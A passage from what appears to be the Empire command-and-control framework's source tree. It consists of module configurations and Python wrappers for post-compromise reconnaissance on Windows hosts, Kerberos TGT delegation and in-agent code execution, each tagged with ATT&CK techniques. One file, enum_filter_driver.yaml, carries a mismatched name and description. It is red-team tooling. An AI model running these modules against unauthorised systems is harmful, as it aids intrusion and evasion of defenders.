 6 | description: Enumerate CAs and templates in the AD using IX509PolicyServerListManager
 7 |   COM object.
 8 | software: ''
 9 | tactics: [TA0043, TA0007]
10 | techniques: [T1590.001, T1590.003, T1482, T1559.001]
11 | background: false
12 | output_extension:
13 | needs_admin: false
14 | opsec_safe: true
15 | language: bof
16 | min_language_version: ''
17 | comments:
18 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
19 | options:
20 |   - name: Architecture
21 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
22 |     required: true
23 |     value: x64
24 |     strict: true
25 |     suggested_values:
26 |       - x64
27 |       - x86
28 | bof:
29 |   x86: bof/situational_awareness/adcs_enum_com2/adcs_enum_com2.x86.o
30 |   x64: bof/situational_awareness/adcs_enum_com2/adcs_enum_com2.x64.o
31 |   entry_point: ''
32 |   format_string: ''
33 | script_path: ''
34 | script_end: ''
35 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/adv_audit_policies.yaml:
--------------------------------------------------------------------------------
 1 | name: adv_audit_policies
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: Retrieve advanced security audit policies.
 7 | software: ''
 8 | tactics: [TA0007, TA0043]
 9 | techniques: [T1615, T1592.002, T1012]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/adv_audit_policies/adv_audit_policies.x86.o
29 |   x64: bof/situational_awareness/adv_audit_policies/adv_audit_policies.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/arp.yaml:
--------------------------------------------------------------------------------
 1 | name: arp
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: List ARP table.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1016, T1018, T1106]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/arp/arp.x86.o
29 |   x64: bof/situational_awareness/arp/arp.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/driversigs.yaml:
--------------------------------------------------------------------------------
 1 | name: driversigs
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: Enumerate installed services Imagepaths to check the signing cert against
 7 |   known AV/EDR vendors.
 8 | software: ''
 9 | tactics: [TA0007, TA0009]
10 | techniques: [T1005, T1518.001, T1652]
11 | background: false
12 | output_extension:
13 | needs_admin: false
14 | opsec_safe: true
15 | language: bof
16 | min_language_version: ''
17 | comments:
18 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
19 | options:
20 |   - name: Architecture
21 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
22 |     required: true
23 |     value: x64
24 |     strict: true
25 |     suggested_values:
26 |       - x64
27 |       - x86
28 | bof:
29 |   x86: bof/situational_awareness/driversigs/driversigs.x86.o
30 |   x64: bof/situational_awareness/driversigs/driversigs.x64.o
31 |   entry_point: ''
32 |   format_string: ''
33 | script_path: ''
34 | script_end: ''
35 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/enumLocalSessions.yaml:
--------------------------------------------------------------------------------
 1 | name: enumLocalSessions
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: Enumerate currently attached user sessions both local and over RDP.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1087.001]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/enumlocalsessions/enumlocalsessions.x86.o
29 |   x64: bof/situational_awareness/enumlocalsessions/enumlocalsessions.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/enum_filter_driver.yaml:
--------------------------------------------------------------------------------
 1 | name: cacls
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: List ARP table.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1083, T1106]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 |   - name: Computer
28 |     description: Specifies the remote system to connect to.
29 |     required: true
30 |     value: '.'
31 | bof:
32 |   x86: bof/situational_awareness/cacls/cacls.x86.o
33 |   x64: bof/situational_awareness/cacls/cacls.x64.o
34 |   entry_point: ''
35 |   format_string: z
36 | script_path: ''
37 | script_end: ''
38 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/env.yaml:
--------------------------------------------------------------------------------
 1 | name: env
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: List process environment variables.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1082, T1106]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/env/env.x86.o
29 |   x64: bof/situational_awareness/env/env.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/ipconfig.yaml:
--------------------------------------------------------------------------------
 1 | name: ipconfig
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: List IPv4 address, hostname, and DNS server.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1016, T1049]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/ipconfig/ipconfig.x86.o
29 |   x64: bof/situational_awareness/ipconfig/ipconfig.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/list_firewall_rules.yaml:
--------------------------------------------------------------------------------
 1 | name: list_firewall_rules
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: List Windows firewall rules.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1082, T1518.001]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/list_firewall_rules/list_firewall_rules.x86.o
29 |   x64: bof/situational_awareness/list_firewall_rules/list_firewall_rules.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/listdns.yaml:
--------------------------------------------------------------------------------
 1 | name: listdns
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: List DNS cache entries. Attempt to query and resolve each.
 7 | software: ''
 8 | tactics: [TA0007, TA0043]
 9 | techniques: [T1590.002]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/listdns/listdns.x86.o
29 |   x64: bof/situational_awareness/listdns/listdns.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/locale.yaml:
--------------------------------------------------------------------------------
 1 | name: locale
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: List system locale language, locale ID, date, time, and country.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1614]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/locale/locale.x86.o
29 |   x64: bof/situational_awareness/locale/locale.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/netGroupList.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | 
 4 | 
 5 | class Module:
 6 |     @staticmethod
 7 |     def generate(
 8 |         main_menu: MainMenu,
 9 |         module: EmpireModule,
10 |         params: dict,
11 |         obfuscate: bool = False,
12 |         obfuscation_command: str = "",
13 |     ):
14 |         params_dict = {
15 |             "Architecture": params["Architecture"],
16 |             "Extra": "0",
17 |             "Domain": params["Domain"],
18 |             "Parameter": "",
19 |         }
20 | 
21 |         return main_menu.modulesv2.generate_script_bof(
22 |             module=module,
23 |             params=params_dict,
24 |             obfuscate=obfuscate,
25 |         )
26 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/netGroupListMembers.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | 
 4 | 
 5 | class Module:
 6 |     @staticmethod
 7 |     def generate(
 8 |         main_menu: MainMenu,
 9 |         module: EmpireModule,
10 |         params: dict,
11 |         obfuscate: bool = False,
12 |         obfuscation_command: str = "",
13 |     ):
14 |         params_dict = {
15 |             "Architecture": params["Architecture"],
16 |             "Setting": "1",
17 |             "Domain": params["Domain"],
18 |             "Group ": params["Group"],
19 |         }
20 | 
21 |         return main_menu.modulesv2.generate_script_bof(
22 |             module=module,
23 |             params=params_dict,
24 |             obfuscate=obfuscate,
25 |         )
26 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/netLocalGroupList.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | 
 4 | 
 5 | class Module:
 6 |     @staticmethod
 7 |     def generate(
 8 |         main_menu: MainMenu,
 9 |         module: EmpireModule,
10 |         params: dict,
11 |         obfuscate: bool = False,
12 |         obfuscation_command: str = "",
13 |     ):
14 |         params_dict = {
15 |             "Architecture": params["Architecture"],
16 |             "ScriptType": "0",
17 |             "Server": params["Server"],
18 |             "AdditionalParam": "",
19 |         }
20 | 
21 |         return main_menu.modulesv2.generate_script_bof(
22 |             module=module,
23 |             params=params_dict,
24 |             obfuscate=obfuscate,
25 |         )
26 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/netLocalGroupListMembers.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | 
 4 | 
 5 | class Module:
 6 |     @staticmethod
 7 |     def generate(
 8 |         main_menu: MainMenu,
 9 |         module: EmpireModule,
10 |         params: dict,
11 |         obfuscate: bool = False,
12 |         obfuscation_command: str = "",
13 |     ):
14 |         params_dict = {
15 |             "Architecture": params["Architecture"],
16 |             "Extra": "1",
17 |             "Server": params["Server"],
18 |             "Group": params["Group"],
19 |         }
20 | 
21 |         return main_menu.modulesv2.generate_script_bof(
22 |             module=module,
23 |             params=params_dict,
24 |             obfuscate=obfuscate,
25 |         )
26 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/netloggedon.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | 
 4 | 
 5 | class Module:
 6 |     @staticmethod
 7 |     def generate(
 8 |         main_menu: MainMenu,
 9 |         module: EmpireModule,
10 |         params: dict,
11 |         obfuscate: bool = False,
12 |         obfuscation_command: str = "",
13 |     ):
14 |         params_dict = {
15 |             "Architecture": params["Architecture"],
16 |             "Hostname": params["Hostname"],
17 |             "Flag": "0",
18 |         }
19 | 
20 |         return main_menu.modulesv2.generate_script_bof(
21 |             module=module,
22 |             params=params_dict,
23 |             obfuscate=obfuscate,
24 |         )
25 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/netshares.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | 
 4 | 
 5 | class Module:
 6 |     @staticmethod
 7 |     def generate(
 8 |         main_menu: MainMenu,
 9 |         module: EmpireModule,
10 |         params: dict,
11 |         obfuscate: bool = False,
12 |         obfuscation_command: str = "",
13 |     ):
14 |         params_dict = {
15 |             "Architecture": params["Architecture"],
16 |             "Hostname": params["Hostname"],
17 |             "Flag": "0",
18 |         }
19 | 
20 |         return main_menu.modulesv2.generate_script_bof(
21 |             module=module,
22 |             params=params_dict,
23 |             obfuscate=obfuscate,
24 |         )
25 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/netstat.yaml:
--------------------------------------------------------------------------------
 1 | name: netstat
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: TCP and UDP IPv4 listing ports.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1049, T1016]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/netstat/netstat.x86.o
29 |   x64: bof/situational_awareness/netstat/netstat.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/nettime.yaml:
--------------------------------------------------------------------------------
 1 | name: nettime
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: Display time on remote computer.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1124]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 |   - name: Hostname
28 |     description: Hostname to query.
29 |     required: true
30 |     value: '.'
31 | bof:
32 |   x86: bof/situational_awareness/nettime/nettime.x86.o
33 |   x64: bof/situational_awareness/nettime/nettime.x64.o
34 |   entry_point: ''
35 |   format_string: Z
36 | script_path: ''
37 | script_end: ''
38 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/netuptime.yaml:
--------------------------------------------------------------------------------
 1 | name: netuptime
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: Return information about the boot time on the local or remote computer.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1082]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 |   - name: Hostname
28 |     description: Hostname to query.
29 |     required: true
30 |     value: '.'
31 | bof:
32 |   x86: bof/situational_awareness/netuptime/netuptime.x86.o
33 |   x64: bof/situational_awareness/netuptime/netuptime.x64.o
34 |   entry_point: ''
35 |   format_string: Z
36 | script_path: ''
37 | script_end: ''
38 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/netview.yaml:
--------------------------------------------------------------------------------
 1 | name: netview
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: List reachable computers in the current domain.
 7 | software: ''
 8 | tactics: [TA0007, TA0043]
 9 | techniques: [T1135, T1018]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/netview/netview.x86.o
29 |   x64: bof/situational_awareness/netview/netview.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/resources.yaml:
--------------------------------------------------------------------------------
 1 | name: resources
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: List memory usage and available disk space on the primary hard drive.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1082]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/resources/resources.x86.o
29 |   x64: bof/situational_awareness/resources/resources.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/routeprint.yaml:
--------------------------------------------------------------------------------
 1 | name: routeprint
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: List IPv4 routes.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1016]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/routeprint/routeprint.x86.o
29 |   x64: bof/situational_awareness/routeprint/routeprint.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/tasklist.yaml:
--------------------------------------------------------------------------------
 1 | name: Tasklist
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: List running processes including PID, PPID, and ComandLine (uses wmi).
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1057]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 |   - name: Server
28 |     description: Computer to query for processes.
29 |     required: false
30 |     value: ''
31 | bof:
32 |   x86: bof/situational_awareness/tasklist/tasklist.x86.o
33 |   x64: bof/situational_awareness/tasklist/tasklist.x64.o
34 |   entry_point: ''
35 |   format_string: Z
36 | script_path: ''
37 | script_end: ''
38 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/uptime.yaml:
--------------------------------------------------------------------------------
 1 | name: uptime
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: List system boot time and how long it has been running.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1082]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/uptime/uptime.x86.o
29 |   x64: bof/situational_awareness/uptime/uptime.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/whoami.yaml:
--------------------------------------------------------------------------------
 1 | name: whoami
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: List whoami /all
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1033]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/whoami/whoami.x86.o
29 |   x64: bof/situational_awareness/whoami/whoami.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/windowlist.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | 
 4 | 
 5 | class Module:
 6 |     @staticmethod
 7 |     def generate(
 8 |         main_menu: MainMenu,
 9 |         module: EmpireModule,
10 |         params: dict,
11 |         obfuscate: bool = False,
12 |         obfuscation_command: str = "",
13 |     ):
14 |         params_dict = {
15 |             "Architecture": params["Architecture"],
16 |             "All": "1" if params.get("all") == "true" else "0",
17 |         }
18 | 
19 |         return main_menu.modulesv2.generate_script_bof(
20 |             module=module,
21 |             params=params_dict,
22 |             obfuscate=obfuscate,
23 |         )
24 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/wmi_query.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | 
 4 | 
 5 | class Module:
 6 |     @staticmethod
 7 |     def generate(
 8 |         main_menu: MainMenu,
 9 |         module: EmpireModule,
10 |         params: dict,
11 |         obfuscate: bool = False,
12 |         obfuscation_command: str = "",
13 |     ):
14 |         resource = f"\\\\{params['System']}\\{params['Namespace']}"
15 | 
16 |         # Build the params dictionary with required prefixes
17 |         params_dict = {
18 |             "Architecture": params["Architecture"],
19 |             "System": params["System"],
20 |             "Namespace": params["Namespace"],
21 |             "Query": params["Query"],
22 |             "Resource": resource,
23 |         }
24 | 
25 |         return main_menu.modulesv2.generate_script_bof(
26 |             module=module,
27 |             params=params_dict,
28 |             obfuscate=obfuscate,
29 |         )
30 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/tgtdelegation.py:
--------------------------------------------------------------------------------
 1 | import random
 2 | 
 3 | from empire.server.common.empire import MainMenu
 4 | from empire.server.core.module_models import EmpireModule
 5 | 
 6 | 
 7 | class Module:
 8 |     @staticmethod
 9 |     def generate(
10 |         main_menu: MainMenu,
11 |         module: EmpireModule,
12 |         params: dict,
13 |         obfuscate: bool = False,
14 |         obfuscation_command: str = "",
15 |     ):
16 |         nonce = random.randint(1000, 10000)
17 | 
18 |         params_dict = {
19 |             "Architecture": params["Architecture"],
20 |             "Nonce": nonce,
21 |             "Domain": params["domain"],
22 |             "SPN": params["SPN"],
23 |         }
24 | 
25 |         return main_menu.modulesv2.generate_script_bof(
26 |             module=module,
27 |             params=params_dict,
28 |             obfuscate=obfuscate,
29 |         )
30 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/code_execution/invoke_boolang.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-Boolang
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@byt3bl33d3r'
 5 |     link: https://twitter.com/byt3bl33d3r
 6 |   - name: Anthony Rose
 7 |     handle: '@Cx01N'
 8 |     link: https://twitter.com/Cx01N_
 9 | description: Executes Boo code from an embedded compiler.
10 | software: ''
11 | tactics: [TA0002, TA0005]
12 | techniques: [T1059, T1620]
13 | background: true
14 | output_extension:
15 | needs_admin: false
16 | opsec_safe: true
17 | language: powershell
18 | min_language_version: '2'
19 | comments:
20 |   - https://github.com/byt3bl33d3r/OffensiveDLR
21 |   - https://github.com/BC-SECURITY/OffensiveDLR
22 | options:
23 |   - name: Agent
24 |     description: Agent to run module on.
25 |     required: true
26 |     value: ''
27 |   - name: BooSource
28 |     description: Base64 encoded boolang code
29 |     required: true
30 |     value: ''
31 | script_path: code_execution/Invoke-Boolang.ps1
32 | script_end: Invoke-Boolang {{ PARAMS }}
33 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/code_execution/invoke_ironpython.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-IronPython
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@byt3bl33d3r'
 5 |     link: https://twitter.com/byt3bl33d3r
 6 |   - name: Anthony Rose
 7 |     handle: '@Cx01N'
 8 |     link: https://twitter.com/Cx01N_
 9 | description: Executes IronPython code using the embedded IPY engine.
10 | software: ''
11 | tactics: [TA0002, TA0005]
12 | techniques: [T1059, T1620]
13 | background: true
14 | output_extension:
15 | needs_admin: false
16 | opsec_safe: true
17 | language: powershell
18 | min_language_version: '2'
19 | comments:
20 |   - https://github.com/byt3bl33d3r/OffensiveDLR
21 |   - https://github.com/BC-SECURITY/OffensiveDLR
22 | options:
